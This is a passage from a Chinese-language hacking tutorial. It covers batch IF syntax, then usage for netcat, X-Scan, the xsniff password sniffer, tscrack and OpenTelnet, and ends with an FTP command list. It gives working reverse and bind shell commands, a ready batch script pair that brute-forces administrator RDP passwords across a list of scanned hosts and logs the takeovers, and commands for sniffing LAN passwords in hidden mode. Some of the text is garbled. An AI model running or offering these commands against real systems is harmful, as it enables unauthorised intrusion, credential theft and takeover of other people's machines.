例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。

0 指发现并成功执行（真）；1 指没有发现、没执行（假）。

IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。

例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）

IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。

例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。

IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”

（二）系统外部命令(均需下载相关工具)：

1、瑞士×××：nc.exe

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行［危险］

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80连接到192.168.0.1主机的80端口

nc -l -p 80开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 > c:\log.txt作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 < c:\honeyport.txt作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称传送文件到对方主机

备注：

| 管道命令

< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

>与>>的区别 ">"指：覆盖；">>"指：保存到(添加到）。

如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]扫锚"起始IP到终止IP"段的所有主机信息

xscan -file <主机列表文件名> <检测项目> [其他选项]扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active检测主机是否存活

-os检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi检测CGI漏洞

-nasl加载Nessus***脚本

-all检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

4、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接（多线程）

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用－f后面的密码

-F 间隔时间（频率）

-l 使用－l后面的用户名

-w 使用－w后面的密码字典

-p 使用－p后面的密码

-D 登录主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic远程用密码字典文件暴破主机的administrator的登陆密码

tscrack 192.168.0.1 -l administrator -p 123456用密码123456远程登陆192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic >>rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。

5、其它：

Shutdown.exe

Shutdown \\IP地址 t:秒后将对方NT自动关闭（Windows 系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows DOS命令中有详细介绍。）

fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）

fpipe -l 80 -s 1029 -r 80 [url][/url]当有人扫锚你的80端口时，他扫到的结果会完全是[url][/url]的主机信息

Fpipe -l 23 -s 88 -r 23 目标IP把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。

OpenTelnet.exe (远程开启telnet工具)

opentelnet.exe \\IP 帐号密码ntlm认证方式Telnet端口（不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet \\ip 连接上对方。

NTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。

ResumeTelnet.exe (OpenTelnet附带的另一个工具)

resumetelnet.exe \\IP帐号密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。

6、FTP命令详解：

FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。

FTP的命令行格式为：

ftp -v -d -i -n -g [主机名] ，其中

-v 显示远程服务器的所有响应信息；

-n 限制ftp的自动登录，即不使用；.n etrc文件；

-d 使用调试方式；

-g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip

2.$ macro-ame[args]： 执行宏定义macro-name。

3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。

16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。

18.disconnection：同close。

19.form format：将文件传输方式设置为format，缺省为file方式。

20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。

22.hash：每传输1024字节，显示一个hash符号(#)。

23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。

24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒

25.p_w_picpath：设置二进制传输方式(同binary)。

26.lcd[dir]：将本地工作目录切换至dir。

27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。

28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete[remote-file]：删除远程主机文件。

30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。

31.mget remote-files：传输多个远程文件。

32.mkdir dir-name：在远程主机中建一目录。

33.mls remote-file local-file：同nlist，但可指定多个文件名。

34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。

36.mput local-file：将多个文件传输至远程主机。

37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。

38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。

40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41.open host[port]：建立指定ftp服务器连接，可指定连接端口。

42.passive：进入被动传输方式。

43.prompt：设置多个文件传输时的交互提示。

44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。

45.put local-file[remote-file]：将本地文件local-file传送至远程主机。

46.pwd：显示远程主机的当前工作目录。

47.quit：同bye，退出ftp会话。

48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

49.recv remote-file[local-file]：同get。

50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

51.rhelp[cmd-name]：请求获得远程主机的帮助。

52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。

53.rename[from][to]：更改远程主机文件名。

54.reset：清除回答队列。

55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。

56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。

58.send local-file[remote-file]：同put。

59.sendport：设置PORT命令的使用。

60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主 61.size file-name：显示远程主机文件大小，如：site idle 7200。

62.status：显示当前ftp状态。

63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。

.sunique：将远程主机文件名存储设置为只一(与runique对应)。

65.system：显示远程主机的操作系统类型。

66.tenex：将文件传输类型设置为TENEX机的所需的类型。

67.tick：设置传输时的字节计数器。

68.trace：设置包跟踪。

69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。

70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。

72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

73.?[cmd]：同help.